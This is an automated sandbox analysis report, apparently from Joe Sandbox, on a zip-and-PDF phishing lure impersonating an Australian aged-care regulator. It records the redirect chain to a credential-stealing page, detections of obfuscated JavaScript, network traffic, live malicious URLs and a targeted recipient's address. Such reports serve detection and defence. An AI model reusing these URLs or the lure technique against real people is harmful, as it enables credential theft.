Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
attach_request_478000006439785.zip

Overview

General Information

Sample name:attach_request_478000006439785.zip
Analysis ID:1446952
MD5:1a4840954efb2ca69ef76b13b84bc28d
SHA1:2ad17c46395439bb22cd5e5aa6fb4c71cea2ddf4
SHA256:911ad9a6db8c1c6bfe00516dcdb045163c39f16e8caa08e1f494f0a550fa23d5
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
AI detected suspicious javascript
HTML page contains hidden URLs or javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 7140 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • Acrobat.exe (PID: 6428 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Temp1_attach_request_478000006439785.zip\Aged Care Quality And Safety Commission_Payment Review#0772-.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 4264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6808 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1608 --field-trial-handle=1596,i,10741502747019713544,8790984211731808162,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 6088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2016,i,1486018253116122347,5634552884418498544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.auSlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://ztyw.kensteg.com/82jPIO/Avira URL Cloud: Label: malware
Source: https://ztyw.kensteg.com/favicon.icoAvira URL Cloud: Label: malware
Source: https://ZtYw.kensteg.com/82jPIO/#DAvira URL Cloud: Label: malware
Source: ztyw.kensteg.comVirustotal: Detection: 5%Perma Link
Source: https://ZtYw.kensteg.com/82jPIO/#DVirustotal: Detection: 5%Perma Link
Source: https://ztyw.kensteg.com/82jPIO/Virustotal: Detection: 5%Perma Link

Phishing

barindex
Source: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.auLLM: Score: 7 Reasons: The JavaScript code contains base64 encoded content which is decoded and written to the document. This is a common technique used in malicious scripts to obfuscate their true purpose. Additionally, the decoded content includes hidden input fields with potentially sensitive data such as IP addresses and URLs, which could be used for malicious purposes such as phishing or data exfiltration. DOM: 0.1.pages.csv
Source: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.auLLM: Score: 7 Reasons: The code includes a form submission that prevents the default action and sends data to a relative URL ('../lozxQrVxxMhOg6cw4HSXzmBzurwrmlx9yjGrOsiims8OcvuP49'). The response handling includes a redirect to a suspicious-looking URL if an error status is returned. This behavior is indicative of potential phishing or data exfiltration attempts. DOM: 0.1.pages.csv
Source: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.auHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
Source: https://ztyw.kensteg.com/82jPIO/#Danitha.pal@agedcarequality.gov.auHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 104.17.3.184 104.17.3.184
Source: Joe Sandbox ViewIP Address: 41.185.8.68 41.185.8.68
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewIP Address: 104.17.2.184 104.17.2.184
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.133
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OaGPxhBvLP17mF5&MD=VFhxtCam HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /play HTTP/1.1Host: cloudbyteit.co.zaConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /play/ HTTP/1.1Host: cloudbyteit.co.zaConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /82jPIO/ HTTP/1.1Host: ztyw.kensteg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://cloudbyteit.co.za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ztyw.kensteg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ztyw.kensteg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/695da7821231/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ztyw.kensteg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ztyw.kensteg.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=888a0b630ed98c1b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ztyw.kensteg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ztyw.kensteg.com/82jPIO/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IndYK0tuT3hZQzVTYk5CRFZWNDl3dmc9PSIsInZhbHVlIjoiaHcyTGRvVmpoQ0FtVUhDelVXaGUxWUZCbDFlc1NabXZxTi9ueHBuT3lTOVd6ekZWbUR3c2doQ0NHMFN4WkxjMnNZVUJCVjd4N21XdW1DbDR1LzlJR2Qvdm01TThzVGlyMHErZVAzSGFPQkJkbE8zT08yL0VWdktGNzlab2dsMm8iLCJtYWMiOiJhYzEyNjhiNjNhYTk4NDg1NGEyNGY4NmYyZWEwN2E5NjYzOGM0MWViYWFiYTAzYjRkMzI4ZDcwY2Y2NjViYWExIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5ZbW5NaE9hb3gyS0RETUUrYWhYSVE9PSIsInZhbHVlIjoiUkRWZlhMVy83RUFyYUhMVjQ1dGVtSndPZ3FVVG11MThXS2RUb1Z0Q0xjMUkzVHBPV3Z5Y0RPN0tiYk0yajZSbC84RnpKNFVKZDhtbEsvbDg2ekJXV01ROEpHTHRmVStLdnpUZDF5WlNWQlE0Nldzd3Nkb1U2M3BMUmpxZUNzY2oiLCJtYWMiOiIwNjg2M2YwYTBiMGNlNTNjNWU5MDU2ZjJhMzY0Njc0MGUwNDdmYjJjZDg0OWRiM2IxNTc0MWFiMjg0OWU1ZTBlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/888a0b630ed98c1b/1716519723558/23a64c74843c301532d921809f7da6984544686c1badac72581a7b16a07a776c/JAENOqaIJs85Hu6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/888a0b630ed98c1b/1716519723558/wlYn9sv82zuVieG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OaGPxhBvLP17mF5&MD=VFhxtCam HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: qslprinting.us22.list-manage.com
Source: global trafficDNS traffic detected: DNS query: cloudbyteit.co.za
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ztyw.kensteg.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/204239232:1716516640:z1Q-82SQEC5453QrRVJiA-W088EwWom7wzPnNIq-U9k/888a0b630ed98c1b/0cc0942b0c543ec HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2695sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 0cc0942b0c543ecsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/cr37t/0x4AAAAAAAXRTsOVR7YNTKTk/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 03:02:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2gwpimc%2Br6phS3zMmiPRXXd1zlhEaJyTFIta4sffFZTO2%2FucZQfsyOiLTVAj%2FbjfUOzyAy5LmBY1GB14dsFOApWm6tIzoHLmhlmQwERwuI7YrCT1%2BJOhgB7c1PYvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 6457Server: cloudflareCF-RAY: 888a0b6c7b584301-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 03:02:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: qY8Z6JkBe7UM2d2WwNlxgA==$U6oLTx27CXzgA0glH+g+Dw==Server: cloudflareCF-RAY: 888a0b769a588ca8-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 24 May 2024 03:02:07 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: gDYWyF7yG3zXn4eFqimepA==$VAT5llEi7HxqSG5+0KB+fw==Server: cloudflareCF-RAY: 888a0b88da911921-EWRalt-svc: h3=":443"; ma=86400
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.5.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chromecache_208.10.drString found in binary or memory: https://ZtYw.kensteg.com/82jPIO/#D
Source: 0638b1d4-fcba-4447-bbbc-e35602466844.tmp.7.dr, 7e033aec-4203-4b11-b77f-0c2f2895010e.tmp.7.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
